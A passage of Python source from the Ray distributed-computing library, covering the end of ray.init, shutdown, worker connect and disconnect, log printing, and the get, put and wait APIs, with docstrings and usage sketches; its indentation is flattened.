f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
        # The user passed in extra keyword arguments but isn't connecting
        # through the Ray client. Raise an error, since this is most likely a
        # typo in a keyword argument.
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if runtime_env:
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
            # We need to disable this if the runtime env is not set.
            # Uploading happens after the core worker is created, and we
            # should prevent default workers from being created before
            # uploading.
            # TODO (yic): Have a separate connection to the gcs client when
            # redis removal is done. The uploading should happen before this
            # one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
# Rewrite the URI. Note the package isn't uploaded to the URI until
# later in the connect.
working_dir_pkg.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
        # # Here the flag `load_code_from_local` would still be True if we
        # # didn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
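# Example (sketch): starting Ray locally and inspecting the returned address
# info; the resource count is illustrative.
#
#   info = ray.init(num_cpus=2, ignore_reinit_error=True)
#   info["node_ip_address"], info["node_id"]
#
# To attach to a running cluster instead, pass its address (or "auto"):
#   ray.init(address="auto")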
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
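# Example (sketch): the test-fixture pattern shutdown() is primarily meant
# for: start a fresh Ray instance per test and always tear it down.
#
#   ray.init(num_cpus=1)
#   try:
#       ...  # run the code under test
#   finally:
#       ray.shutdown()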
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
    This runs in a separate thread on the driver and logs error messages
    that are published to the driver by the cluster.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
        job_id: The ID of the job. If None, one will be generated.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
        ray_debugger_external (bool): If True, make the Ray debugger
            available externally to the node this worker is running on.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
    elif mode not in (WORKER_MODE, LOCAL_MODE, SPILL_WORKER_MODE,
                      RESTORE_WORKER_MODE):
        raise ValueError(
            "Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid)
worker.gcs_client = worker.core_worker.get_gcs_client()
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
manager = working_dir_pkg.WorkingDirManager(
worker.node.get_runtime_env_dir_path())
manager.upload_runtime_env_package_if_needed(job_config)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
        key (str): The key name for the message. Multiple messages under
            different keys will be displayed at the same time. Messages
            under the same key will be overridden.
        dtype (str): The type of message for rendering. One of the
            following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
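# Example (sketch): reporting progress from inside a long-running task; the
# key name and message format are illustrative.
#
#   @ray.remote
#   def long_job(n):
#       for i in range(n):
#           show_in_dashboard("step {}/{}".format(i, n), key="progress")
#           ...  # do some work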
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
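    A minimal usage sketch of fetching task results (illustrative only;
    assumes ``ray.init()`` has already been called and ``f`` is a
    hypothetical task):
    .. code-block:: python
    @ray.remote
    def f():  # hypothetical task
        return 1
    refs = [f.remote() for _ in range(3)]
    assert ray.get(refs) == [1, 1, 1]
    assert ray.get(refs[0], timeout=10) == 1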
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
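    A minimal usage sketch (illustrative only; assumes ``ray.init()`` has
    already been called):
    .. code-block:: python
    data = list(range(10 ** 6))  # any serializable Python object
    ref = ray.put(data)          # stored once in the object store
    assert ray.get(ref)[:3] == [0, 1, 2]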
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
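    A minimal usage sketch (illustrative only; assumes ``ray.init()`` has
    already been called and ``f`` is a hypothetical task):
    .. code-block:: python
    @ray.remote
    def f(i):  # hypothetical task
        return i
    refs = [f.remote(i) for i in range(4)]
    ready, not_ready = ray.wait(refs, num_returns=2)
    assert len(ready) == 2 and len(not_ready) == 2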
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
